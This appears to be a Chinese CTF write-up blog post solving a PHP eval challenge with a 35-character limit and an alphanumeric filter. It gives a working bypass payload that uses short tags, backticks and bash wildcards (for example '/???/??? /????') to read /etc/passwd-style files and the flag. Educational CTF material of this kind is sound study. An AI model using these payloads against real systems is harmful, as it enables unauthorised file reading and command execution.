双11-X计划平台WEB1Wp

最新推荐文章于 2021-11-09 19:59:28 发布
最新推荐文章于 2021-11-09 19:59:28 发布
阅读量388 收藏
点赞数
分类专栏: 网络安全 CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/whatiwhere/article/details/83931741
版权

双11-X计划平台WEB1Wp

题目IP地址为 101.71.29.5:10049
打开题目为:

<?php
include 'flag.php';
if(isset($_GET['code'])){
    $code = $_GET['code'];
    if(strlen($code)>35){
        die("Long.");
    }
    if(preg_match("/[A-Za-z0-9_$]+/",$code)){
        die("NO.");
    }
    @eval($code);
}else{
    highlight_file(__FILE__);
}
//$hint =  "php function getFlag() to get flag";
?>

看了半天都没有头绪 看了好多大师傅的wp ,这个最类似 https://www.cnblogs.com/ECJTUACM-873284962/p/9433641.html

发现根本不能够复现,因为长度限制到了35 。
所以呢

在正则过滤那边,可以看到’$'和’_'都被过滤了,这直接导致了即使用上述方法得到了字符串,也没办法执行php的函数(这里纠正一下,php7中我们是可以通过(‘func_name’)()在执行函数的,这样其实错误思路是可行的,甚至在无字母数字webshell之提高篇中,作者直接使用了取反字符串的方法构造了payload)。正确的做法使用php短标签是直接读文件,考虑如下php代码:

<?= `ls`?>

执行结果

可以看到,<? ?>是php的短标签,效果等同于:

<?php echo `ls` ?>

那么在eval中怎么用这个短标签呢?答案是先使用tag(?>)离开当前模式,再使用短标签,即eval(?><?= `ls`?>)。

接下来就是怎么绕过正则了,bash里面用通配符绕过就好了,即

cat /etc/passwd #替换为
/???/??t /??c/p???w?
因此paylaod为code=?><?=`/???/??? /???/???/????/*`;?> 相当于code=?><?=` /bin/cat /var/www/html/*`;?>, 会发现php代码里面的源代码getflag那一部分的函数是是从/flag里面读取的,那么构造code=?><?=`/???/??? /????`;?>相当于code=?><?=` /bin/cat /flag`;?>即可。

得到flag
flag{aa5237a5fc25af3fa07f1d724f7548d7}

拓展学习

whatiwhere
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
安恒X计划平台10月月赛逆向题easytree题目思路
iqiqiya的博客
10-27 3395
ps:做的晚了 最后十分钟才开始就下载下来这么一道题 难受 ida载入发现有UPX壳 file一下可以知道是windows下可执行文件 直接加上后缀.exe ESP定律脱壳 之后载入ida shift + f12看到有成功提示 双击进入 双击引用 F5 可以看到关键代码就在main() int __cdecl main(int argc, cons...
[SWPU2019]Web1wp
m0_55185160的博客
04-17 2684
我们用sql的惯用姿势1’ or 1=1#去试显示登录失败,也不是get方式传参,还有下面的注册,觉得这里不存在sql注入,注册后发现用户名叫admin已经被注册过了,也发现这里应该不存在注入,随便注册一个账号,登录看这个网站有什么功能。 发现可能在广告申请处有可能存在sql注入, 这里存在waf,于是fuzz测试一下,但是在测试时发现广告申请条数存在限制,必须要清空广告申请列表才可以写下一个申请,所以只能手动测试 我们发现有or # and --+被过滤了 我们发现..
ctf.show web 1 wp
weixin_50775046的博客
11-15 93
题面没有太多的提示,因为是签到题,应该不会太难,先检查看看查看器中是否有透露信息。在查看器中发现,有一串注释,看样子是base64,用工具解码 本题flag便得到了
实验吧WEBWP(一)
Yale的博客
03-19 2698
1.Forms(链接:http://www.shiyanbar.com/ctf/1819) 页面很干净,第一反应查看源码 在此之前,我们先随便输入然后点击enter,没什么线索 源码中我们看到value=0 将value改为1,再随便输入然后点击enter 毫无疑问,输入的内容就应该是a的值 得到flag2.天网管理系统(http://www.shiyanbar.com/ctf/
web前端——实现倒计时,“距离双11天猫狂欢节还剩xxx”
weixin_44831983的博客
11-09 1283
小白总结一下最近学到的前端知识,实现倒计时~~ 两步: 第一步:在body中添加οnlοad=”show()”,onload事件是浏览器解析完页面之后就会自动触发的事件 <body onload=”show()”> <div id=”time”>此处为替换内容</div> </body> 第二步:在head中添加js事件 <head> <script> function show(){ var nowtime=new Da
X9315WP-2.7的技术参数
12-11
X9315WP-2.7工作电压(V):2.7~5.5总阻值(kΩ):10端电压(V):0~5抽头数:32接口方式:CS,U/D,INC电阻增加方式:线性工作电流(mA):0.050封装/温度(℃):8PDIP/0~70描述:低功耗,低噪声,单DCP,抽头位置掉电保存价格/1片(套):...
X9313WP-3的技术参数
12-12
产品型号:X9313WP-3工作电压(V):3~5.5总阻值(kΩ):10端电压(V):-5~5抽头数:32接口方式:CS,U/D,INC电阻增加方式:线性工作电流(mA):3封装/温度(℃):8PDIP/0~70描述:单DCP,抽头位置掉电自动保存价格/1片(套):¥6.49 
wp-autopost.2.9.2_wp-autopost.2.9.2_wp采集_源码
10-02
而wp-autopost 2.9.2正是这样一个针对WordPress平台的专业自动采集插件,它允许用户自动化地从各种来源抓取内容并发布到自己的网站上,极大地提升了内容更新的效率。本文将深入探讨该插件的功能、使用方法以及其在...
web-stories-wp:WordPress的网络故事
02-05
建立状态 是一种免费的开放式Web视觉叙事格式,可让您轻松地通过引人入胜的动画和可点击的交互方式创建视觉叙事,并使读者沉浸在出色且快速加载的全屏体验中。 借助 ,我们提供了一流的Web Stories支持。 通过直接...
web-product-dark_WordPress_wp_
10-03
【标题】"web-product-dark_WordPress_wp_" 指的是一款专门为RevoSlider设计的WordPress主题,名为"web-product-dark"。RevoSlider是一个流行的WordPress滑块插件,用于创建吸引人的动态内容展示,如产品滑块、图像...
wp-pot-cli:通过cli运行wp-pot脚本
02-05
在这里做:安装$ npm install --global wp-pot-cli用法$ wp-pot --help Generate pot-files for WordPress localization Usage $ wp-pot <options> Options --bug-report, -b Header with URL for reporting ...
wp-cli::gear:WP-CLI框架
02-04
WP-CLI 是的命令行界面。 您可以在不使用网络浏览器的情况下更新插件,配置多站点安装等等。 可以通过以下方式进行持续维护: 当前的稳定版本是。 有关公告,关注或。 ,以了解即将发布的版本计划。 快速链接:|...
wp-cli-themecheck:在WP_CLI中运行Themecheck
02-05
anhskohbo / wp-cli-themecheck 快速链接:| |使用wp themecheck正在安装安装此软件包需要WP-CLI v0.23.0或更高版本。 使用wp cli update更新到最新的稳定版本。 完成此操作后,可以使用wp package install ...
WP7版COCOS2D-X
03-30
针对Windows Phone 7(WP7)平台的COCOS2D-X版本,为移动游戏开发提供了一个全新的解决方案。这款引擎是COCOS2D-X针对XNA框架的适配,让开发者能够利用C++或Lua等语言在Windows Phone平台上创建高性能的游戏应用。 ...
Learn-wp-cli:命令行,WP-CLI和自定义WP-CLI命令入门
02-05
1. **备份与恢复**:使用WP-CLI,你可以轻松备份数据库(`wp db export`)和导出网站文件(`tar -czf wp_files.tar.gz wp-content`),在需要时进行恢复。 2. **性能优化**:`wp optimize db`命令可以帮助你清理和优化...
CTF—命令执行总结
qq_45927819的博客
11-13 3878
文章目录前言空格绕过命令分割符关键词过滤编码绕过 前言 最近遇到了好多命令执行的web题,这就来总结一下这方面的知识!! 空格绕过 常见的绕过符号有: $IFS$9 、${IFS} 、%09(php环境下)、 重定向符<>、> $IFS在linux下表示分隔符,如果不加{}则bash会将IFS解释为一个变量名, 加一个{}就固定了变量名,$IFS$9后面之所以加个$是为了起到截断的作用 ;为什么要用$9呢,因为$9只是当前系统shell进程的第九个参数的持有者,它始终为空字符串。 不仅 $
安恒双11活动题目
suddenlyTW的博客
11-12 911
  由于是昨天的题目,今天链接已经无法点开了,所以通过其他大神的地方把题扣了过来 web1: 代码如下:   &lt;?php include 'flag.php'; if(isset($_GET['code'])){ $code = $_GET['code']; if(strlen($code)&gt;35){ die("Long."); } ...
安恒10月赛Web题目复现
0verWatch的博客
11-08 5315
前言 10月赛的时候去打那个瓜皮的领航杯(体验极差),还是回来复现安恒的题目比较好,质量还是有保证的,学到很多东西 正文 easy audit 这个题目确实有点脑洞。。运用了两个php函数一个是get_defined_functions这个函数是用于返回所有已定义函数的数组,而另外一个则是get_defined_vars 这个函数是返回由所有已定义变量所组成的数组 可以查看此网址:https://...
记一次拿webshell踩过的坑(如何用PHP编写一个不包含数字和字母的后门)
weixin_33943347的博客
08-06 754
0x01 前言 最近在做代码审计的工作中遇到了一个难题,题目描述如下: &lt;?php include 'flag.php'; if(isset($_GET['code'])){ $code = $_GET['code']; if(strlen($code)&gt;40){ die("Long."); } if(preg_ma...
XXXX系统测试计划模板 - 心力教育WP06班X组
"这是一份详细的软件测试计划模板,由心力教育-WP06班-X组编写,用于指导测试工作的执行。这份文档包含了从项目背景、测试策略、测试方法到资源需求、时间进度和测试过程管理等多个方面的内容,旨在为测试团队提供...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值